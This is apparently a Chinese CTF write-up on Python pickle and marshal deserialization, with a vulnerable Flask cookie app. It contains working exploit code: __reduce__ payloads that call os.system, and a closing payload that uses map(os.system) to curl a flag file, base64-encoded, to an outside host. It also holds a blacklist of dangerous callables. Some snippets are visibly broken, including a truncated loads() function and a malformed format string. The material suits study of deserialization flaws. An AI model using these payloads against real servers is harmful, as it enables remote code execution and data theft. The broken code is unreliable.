Python pickle 命令执行与 marshal 任意代码执行

1.python pickle反序列化漏洞



import pickle
import os
class gen(object):
    """Demonstration object whose pickled form calls ``os.system`` on load."""

    def __reduce__(self):
        # pickle stores the returned (callable, args) pair and invokes
        # callable(*args) when the data is unpickled.
        s = """dir"""
        return os.system, (s,)

# Serialise the demonstration object and store the bytes on disk so the
# loader example further down has a file to read.
p = gen()
payload = pickle.dumps(p)
with open('payload.pkl', 'wb') as f:
    # The original `with` statement had no body, which is a syntax error and
    # meant the payload was never written.
    f.write(payload)




import pickle
some code
pickle.load(open('./payload.pkl'))
some code

假设以上这段代码是服务器端处理反序列化数据时的操作:它没有对将要调用的对象或函数做任何过滤,而是直接进行反序列化,最终导致服务器执行 os.system("dir")。


import marshal
import base64

# Placeholder function; its compiled code object (`foo.func_code`, a
# Python 2 attribute) is what gets marshalled and base64-encoded below.
def foo():
    pass # Your code here

# NOTE(review): the template string below contains no `%s` placeholder, so the
# `%` operator raises TypeError ("not all arguments converted"). The text looks
# truncated by the paste — confirm against the original article.
print """ctypes
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))


# Reverse of the encoding step: base64-decode the text, unmarshal it into a
# code object, then wrap that code object in a function whose name is ''.
# NOTE(review): `code_enc` and the `types` module are not defined or imported
# in the visible snippet — presumably supplied by surrounding code; confirm.
code_str = base64.b64decode(code_enc)
code = marshal.loads(code_str)
func = types.FunctionType(code, globals(), '')


from __future__ import unicode_literals
from flask import Flask, request, make_response, redirect, url_for, session
from flask import render_template, flash, redirect, url_for, request
from werkzeug.security import safe_str_cmp
from base64 import b64decode as b64d
from base64 import b64encode as b64e
from hashlib import sha256
from cStringIO import StringIO
import random
import string

import os
import sys
import subprocess
import commands
import pickle
import cPickle
import marshal
import os.path
import filecmp
import glob
import linecache
import shutil
import dircache
import io
import timeit
import popen2
import code
import codeop
import pty
import posixfile

# Secret-key constant; nothing in the visible code reads it.
SECRET_KEY = 'you will never guess'

# Create the cookie-signing secret on first start and persist it so that it
# survives restarts. An empty file is treated as missing, because an empty
# secret would leave the cookie digest effectively unkeyed.
# NOTE(review): four characters drawn from `random` are brute-forceable; the
# length and generator are kept as in the original.
if not os.path.exists('.secret') or os.path.getsize('.secret') == 0:
    secret = ''.join(random.choice(string.ascii_letters + string.digits)
                     for x in range(4))
    with open(".secret", "w") as f:
        # The original generated the value but never wrote it, so the file
        # stayed empty and cookie_secret was always ''.
        f.write(secret)
with open(".secret", "r") as f:
    cookie_secret = f.read().strip()

# The Flask application object that the route decorator and app.run() use.
app = Flask(__name__)

# Callables that must not appear on the unpickler's stack: _hook_call raises
# FilterException when any stack entry is a member of this list.
# Several entries (execfile, file, os.popen2, commands.*, popen2.*, ...) only
# exist on Python 2, so evaluating this list requires a Python 2 interpreter.
black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]

def count():
    """Reset the session's ``cnt`` counter to zero.

    ``cnt`` is the value the ``_hook_call`` wrapper increments and compares
    against its limit.
    NOTE(review): no decorator is visible on this function; presumably it was
    registered to run before each request — confirm against the original.
    """
    session['cnt'] = 0

def home():
    """Render the index page with the location recovered from the cookie.

    Returns a redirect to the ``clear`` endpoint when ``getlocation()``
    compares equal to ``False``; otherwise the rendered ``index.html``.
    """
    greeting = 'Hello, here\'s what we remember for you. And you can change, delete or extend it.'
    # Assigned but not used by any visible statement in this function.
    prompt = 'Hello fellow zombie, have you found a tasty brain and want to remember where? Go right here and enter it:'
    remembered = getlocation()
    cookie_rejected = (remembered == False)
    if not cookie_rejected:
        return render_template('index.html', txt=greeting, location=remembered)
    return redirect(url_for("clear"))

def clear():
    """Expire the ``location`` cookie and redirect the client to ``home``."""
    print("Reminder cleared!")
    target = url_for('home')
    reply = redirect(target)
    # max_age=0 makes the cookie expire immediately on the client.
    reply.set_cookie('location', max_age=0)
    return reply

@app.route('/reminder', methods=['POST', 'GET'])
def reminder():
    """Store a submitted reminder in the ``location`` cookie (POST) or show
    the reminder form (GET).

    NOTE(review): the source lost its indentation; the nesting below is the
    most plausible reading (an ``else:`` between the two messages may also
    have been lost) and should be confirmed against the original.
    """
    if request.method == 'POST':
        location = request.form["reminder"]
        if location == '':
            print("Message cleared, tell us when you have found more brains.")
        print("We will remember where you find your brains.")
        # The cookie payload is the base64 text of the pickled form value,
        # prefixed with its digest by make_cookie().
        location = b64e(pickle.dumps(location))
        cookie = make_cookie(location, cookie_secret)
        response = redirect(url_for('home'))
        response.set_cookie('location', cookie)
        print 'location'
        return response
    # Non-POST request: check any existing cookie before showing the form.
    location = getlocation()
    if location == False:
        return redirect(url_for("clear"))
    return render_template('reminder.html')

class FilterException(Exception):
    """Error carrying a message that names a disallowed callable object."""

    def __init__(self, value):
        # Build the message first, then hand it to the base Exception.
        described = str(value)
        message = 'The callable object {value} is not allowed'.format(value=described)
        super(FilterException, self).__init__(message)

class TimesException(Exception):
    """Error raised with a fixed message about too many calls."""

    def __init__(self):
        message = 'Call func too many times!'
        super(TimesException, self).__init__(message)

def _hook_call(func):
    """Wrap an unpickler opcode handler with a blacklist and call-count check.

    The wrapper expects the unpickler as its first positional argument (it
    reads ``args[0].stack``). It raises ``FilterException`` when a stack entry
    is in ``black_type_list`` and ``TimesException`` once ``session['cnt']``
    exceeds 4; otherwise it delegates to ``func``.

    NOTE(review): the source lost its indentation; the count check is placed
    after the loop here — confirm against the original.
    """
    def wrapper(*args, **kwargs):
        session['cnt'] += 1
        print session['cnt']
        print args[0].stack
        # Only the stack entries themselves are compared; objects nested
        # inside a tuple or list on the stack are not inspected.
        for i in args[0].stack:
            if i in black_type_list:
                # Reports the second-from-top stack entry in the message.
                raise FilterException(args[0].stack[-2])
        if session['cnt'] > 4:
            raise TimesException()
        return func(*args, **kwargs)
    return wrapper

def loads(strs):
files = StringIO(strs)
unpkler = pickle.Unpickler(files)
print strs,files,unpkler
unpkler.dispatch[pickle.REDUCE] = _hook_call(
return unpkler.load()

def getlocation():
    """Validate the ``location`` cookie and return the value stored in it.

    Returns:
        ``''`` when the request carries no ``location`` cookie, ``False`` when
        the cookie is malformed or its digest does not match, otherwise the
        object obtained by unpickling the base64-decoded payload.
    """
    cookie = request.cookies.get('location')
    if not cookie:
        return ''
    # The cookie is client-controlled. Unpacking a split with anything other
    # than exactly one "!" raised ValueError; reject it like any other
    # invalid cookie instead.
    parts = cookie.split("!")
    if len(parts) != 2:
        print("Hey! This is not a valid cookie! Leave me alone.")
        return False
    (digest, location) = parts
    print (digest, location),calc_digest(location, cookie_secret)
    if not safe_str_cmp(calc_digest(location, cookie_secret), digest):
        print("Hey! This is not a valid cookie! Leave me alone.")

        return False
    # SECURITY: the payload is unpickled once the digest matches, so the
    # secrecy of cookie_secret is the only thing gating deserialization.
    location = loads(b64d(location))
    return location

def make_cookie(location, secret):
    """Return the cookie text ``<digest>!<location>`` for the given payload."""
    digest = calc_digest(location, secret)
    return "%s!%s" % (digest, location)

def calc_digest(location, secret):
    """Return the hex SHA-256 digest of ``location`` followed by ``secret``.

    Args:
        location: The cookie payload text.
        secret: The server-side secret appended before hashing.

    Returns:
        The 64-character hexadecimal digest string.

    NOTE(review): this is a plain hash of payload+secret, not an HMAC; the
    construction is kept so existing cookies stay valid.
    """
    material = "%s%s" % (location, secret)
    # Hash functions operate on bytes. Encode text explicitly rather than
    # relying on an implicit ASCII conversion; for the ASCII inputs that
    # worked before, the digest is unchanged.
    if not isinstance(material, bytes):
        material = material.encode("utf-8")
    return sha256(material).hexdigest()

# Start the Flask server on port 5051 only when this file is run as a script.
if __name__ == '__main__':

    app.run(host="", port=5051)


class Test(object):
    """Proof-of-concept object from the write-up; unpickling its serialized
    form invokes the callable returned by ``__reduce__``."""
    def __init__(self):
        self.a = 1
        self.b = '2'
        self.c = '3'
    def __reduce__(self):
        # The callable handed to pickle is `map`; `os.system` appears only
        # inside the argument tuple.
        return map,(os.system,["curl h7x7ty.ceye.io/`cat /flag_is_here|base64`"])

# Pickle the object and base64-encode it, the same encoding reminder() applies
# to the cookie payload.
aa = Test()
payload = b64e(pickle.dumps(aa))
